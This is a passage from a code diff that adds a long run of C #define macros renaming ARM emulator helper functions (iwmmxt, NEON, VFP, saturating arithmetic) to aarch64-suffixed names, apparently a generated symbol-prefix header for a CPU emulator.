gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_aarch64 +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_aarch64 +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_aarch64 +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_aarch64 +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_aarch64 +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_aarch64 +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_aarch64 +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_aarch64 +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_aarch64 +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_aarch64 +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_aarch64 +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_aarch64 +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_aarch64 +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_aarch64 +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_aarch64 +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_aarch64 +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_aarch64 +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_aarch64 +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_aarch64 +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_aarch64 +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_aarch64 +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_aarch64 +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_aarch64 +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_aarch64 +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_aarch64 +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_aarch64 +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_aarch64 +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_aarch64 +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_aarch64 +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_aarch64 +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_aarch64 +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_aarch64 +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_aarch64 +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_aarch64 +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_aarch64 +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_aarch64 +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_aarch64 +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_aarch64 +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_aarch64 +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_aarch64 +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_aarch64 +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_aarch64 +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_aarch64 +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_aarch64 +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_aarch64 +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_aarch64 +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_aarch64 +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_aarch64 +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_aarch64 +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_aarch64 +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_aarch64 +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_aarch64 +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_aarch64 +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_aarch64 +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_aarch64 +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_aarch64 +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_aarch64 +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_aarch64 +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_aarch64 +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_aarch64 +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_aarch64 +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_aarch64 +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_aarch64 +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_aarch64 +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_aarch64 +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_aarch64 +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_aarch64 +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_aarch64 +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_aarch64 +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_aarch64 +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_aarch64 +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_aarch64 +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_aarch64 +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_aarch64 +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_aarch64 +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_aarch64 +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_aarch64 +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_aarch64 +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_aarch64 +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_aarch64 +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_aarch64 +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_aarch64 +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_aarch64 +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_aarch64 +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_aarch64 +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_aarch64 +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_aarch64 +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_aarch64 +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_aarch64 +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_aarch64 +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_aarch64 +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_aarch64 +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_aarch64 +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_aarch64 +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_aarch64 +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_aarch64 +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_aarch64 +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_aarch64 +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_aarch64 +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_aarch64 +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_aarch64 +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_aarch64 +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_aarch64 +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_aarch64 +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_aarch64 +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_aarch64 +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_aarch64 +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_aarch64 +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_aarch64 +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_aarch64 +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_aarch64 +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_aarch64 +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_aarch64 +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_aarch64 +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_aarch64 +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_aarch64 +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_aarch64 +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_aarch64 +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_aarch64 +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_aarch64 +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_aarch64 +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_aarch64 +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_aarch64 +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_aarch64 +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_aarch64 +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_aarch64 +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_aarch64 +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_aarch64 +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_aarch64 +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_aarch64 +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_aarch64 +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_aarch64 +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_aarch64 +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_aarch64 +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_aarch64 +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_aarch64 +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_aarch64 +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_aarch64 +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_aarch64 +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_aarch64 +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_aarch64 +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_aarch64 +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_aarch64 +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_aarch64 +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_aarch64 +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_aarch64 +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_aarch64 +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_aarch64 +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_aarch64 +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_aarch64 +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_aarch64 +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_aarch64 +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_aarch64 +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_aarch64 +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_aarch64 +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_aarch64 +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_aarch64 +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_aarch64 +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_aarch64 +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_aarch64 +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_aarch64 +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_aarch64 +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_aarch64 +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_aarch64 +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_aarch64 +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_aarch64 +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_aarch64 +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_aarch64 +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_aarch64 +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_aarch64 +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_aarch64 +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_aarch64 +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_aarch64 +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_aarch64 +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_aarch64 +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_aarch64 +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_aarch64 +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_aarch64 +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_aarch64 +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_aarch64 +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_aarch64 +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_aarch64 +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_aarch64 +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_aarch64 +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_aarch64 +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_aarch64 +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_aarch64 +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_aarch64 +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_aarch64 +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_aarch64 +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_aarch64 +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_aarch64 +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_aarch64 +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_aarch64 +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_aarch64 +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_aarch64 +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_aarch64 +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_aarch64 +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_aarch64 +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_aarch64 +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_aarch64 +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_aarch64 +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_aarch64 +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_aarch64 +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_aarch64 +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_aarch64 +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_aarch64 +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_aarch64 +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_aarch64 +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_aarch64 +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_aarch64 +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_aarch64 +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_aarch64 +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_aarch64 +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_aarch64 +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_aarch64 +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_aarch64 +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_aarch64 +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_aarch64 +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_aarch64 +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_aarch64 +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_aarch64 +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_aarch64 +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_aarch64 +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_aarch64 +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_aarch64 +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_aarch64 +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_aarch64 +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_aarch64 +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_aarch64 +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_aarch64 +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_aarch64 +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_aarch64 +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_aarch64 +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_aarch64 +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_aarch64 +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_aarch64 +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_aarch64 +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_aarch64 +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_aarch64 +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_aarch64 +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_aarch64 +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_aarch64 +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_aarch64 +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_aarch64 +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_aarch64 +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_aarch64 +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_aarch64 +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_aarch64 +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_aarch64 +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_aarch64 +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_aarch64 +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_aarch64 +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_aarch64 +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_aarch64 +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_aarch64 +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_aarch64 +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_aarch64 +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_aarch64 +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_aarch64 +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_aarch64 +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_aarch64 +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_aarch64 +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_aarch64 +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_aarch64 +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_aarch64 +#define gen_helper_neon_tbl gen_helper_neon_tbl_aarch64 +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_aarch64 +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_aarch64 +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_aarch64 +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_aarch64 +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_aarch64 +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_aarch64 +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_aarch64 +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_aarch64 +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_aarch64 +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_aarch64 +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_aarch64 +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_aarch64 +#define gen_helper_neon_zip16 gen_helper_neon_zip16_aarch64 +#define gen_helper_neon_zip8 gen_helper_neon_zip8_aarch64 +#define gen_helper_pre_hvc gen_helper_pre_hvc_aarch64 +#define gen_helper_pre_smc gen_helper_pre_smc_aarch64 +#define gen_helper_qadd16 gen_helper_qadd16_aarch64 +#define gen_helper_qadd8 gen_helper_qadd8_aarch64 +#define gen_helper_qaddsubx gen_helper_qaddsubx_aarch64 +#define gen_helper_qsub16 gen_helper_qsub16_aarch64 +#define gen_helper_qsub8 gen_helper_qsub8_aarch64 +#define gen_helper_qsubaddx gen_helper_qsubaddx_aarch64 +#define gen_helper_rbit gen_helper_rbit_aarch64 +#define gen_helper_recpe_f32 gen_helper_recpe_f32_aarch64 +#define gen_helper_recpe_u32 gen_helper_recpe_u32_aarch64 +#define gen_helper_recps_f32 gen_helper_recps_f32_aarch64 +#define gen_helper_rintd gen_helper_rintd_aarch64 +#define gen_helper_rintd_exact gen_helper_rintd_exact_aarch64 +#define gen_helper_rints gen_helper_rints_aarch64 +#define gen_helper_rints_exact gen_helper_rints_exact_aarch64 +#define gen_helper_ror_cc gen_helper_ror_cc_aarch64 +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_aarch64 +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_aarch64 +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_aarch64 +#define gen_helper_sadd16 gen_helper_sadd16_aarch64 +#define gen_helper_sadd8 gen_helper_sadd8_aarch64 +#define gen_helper_saddsubx gen_helper_saddsubx_aarch64 +#define gen_helper_sar_cc gen_helper_sar_cc_aarch64 +#define gen_helper_sdiv gen_helper_sdiv_aarch64 +#define gen_helper_sel_flags gen_helper_sel_flags_aarch64 +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_aarch64 +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_aarch64 +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_aarch64 +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_aarch64 +#define gen_helper_set_rmode gen_helper_set_rmode_aarch64 +#define gen_helper_set_user_reg gen_helper_set_user_reg_aarch64 +#define gen_helper_shadd16 gen_helper_shadd16_aarch64 +#define gen_helper_shadd8 gen_helper_shadd8_aarch64 +#define gen_helper_shaddsubx gen_helper_shaddsubx_aarch64 +#define gen_helper_shl_cc gen_helper_shl_cc_aarch64 +#define gen_helper_shr_cc gen_helper_shr_cc_aarch64 +#define gen_helper_shsub16 gen_helper_shsub16_aarch64 +#define gen_helper_shsub8 gen_helper_shsub8_aarch64 +#define gen_helper_shsubaddx gen_helper_shsubaddx_aarch64 +#define gen_helper_ssat gen_helper_ssat_aarch64 +#define gen_helper_ssat16 gen_helper_ssat16_aarch64 +#define gen_helper_ssub16 gen_helper_ssub16_aarch64 +#define gen_helper_ssub8 gen_helper_ssub8_aarch64 +#define gen_helper_ssubaddx gen_helper_ssubaddx_aarch64 +#define gen_helper_sub_saturate gen_helper_sub_saturate_aarch64 +#define gen_helper_sxtb16 gen_helper_sxtb16_aarch64 +#define gen_helper_uadd16 gen_helper_uadd16_aarch64 +#define gen_helper_uadd8 gen_helper_uadd8_aarch64 +#define gen_helper_uaddsubx gen_helper_uaddsubx_aarch64 +#define gen_helper_udiv gen_helper_udiv_aarch64 +#define gen_helper_uhadd16 gen_helper_uhadd16_aarch64 +#define gen_helper_uhadd8 gen_helper_uhadd8_aarch64 +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_aarch64 +#define gen_helper_uhsub16 gen_helper_uhsub16_aarch64 +#define gen_helper_uhsub8 gen_helper_uhsub8_aarch64 +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_aarch64 +#define gen_helper_uqadd16 gen_helper_uqadd16_aarch64 +#define gen_helper_uqadd8 gen_helper_uqadd8_aarch64 +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_aarch64 +#define gen_helper_uqsub16 gen_helper_uqsub16_aarch64 +#define gen_helper_uqsub8 gen_helper_uqsub8_aarch64 +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_aarch64 +#define gen_helper_usad8 gen_helper_usad8_aarch64 +#define gen_helper_usat gen_helper_usat_aarch64 +#define gen_helper_usat16 gen_helper_usat16_aarch64 +#define gen_helper_usub16 gen_helper_usub16_aarch64 +#define gen_helper_usub8 gen_helper_usub8_aarch64 +#define gen_helper_usubaddx gen_helper_usubaddx_aarch64 +#define gen_helper_uxtb16 gen_helper_uxtb16_aarch64 +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_aarch64 +#define gen_helper_v7m_msr gen_helper_v7m_msr_aarch64 +#define gen_helper_vfp_absd gen_helper_vfp_absd_aarch64 +#define gen_helper_vfp_abss gen_helper_vfp_abss_aarch64 +#define gen_helper_vfp_addd gen_helper_vfp_addd_aarch64 +#define gen_helper_vfp_adds gen_helper_vfp_adds_aarch64 +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_aarch64 +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_aarch64 +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_aarch64 +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_aarch64 +#define gen_helper_vfp_divd gen_helper_vfp_divd_aarch64 +#define gen_helper_vfp_divs gen_helper_vfp_divs_aarch64 +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_aarch64 +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_aarch64 +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_aarch64 +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_aarch64 +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_aarch64 +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_aarch64 +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_aarch64 +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_aarch64 +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_aarch64 +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_aarch64 +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_aarch64 +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_aarch64 +#define gen_helper_vfp_mins gen_helper_vfp_mins_aarch64 +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_aarch64 +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_aarch64 +#define gen_helper_vfp_muld gen_helper_vfp_muld_aarch64 +#define gen_helper_vfp_muls gen_helper_vfp_muls_aarch64 +#define gen_helper_vfp_negd gen_helper_vfp_negd_aarch64 +#define gen_helper_vfp_negs gen_helper_vfp_negs_aarch64 +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_aarch64 +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_aarch64 +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_aarch64 +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_aarch64 +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_aarch64 +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_aarch64 +#define 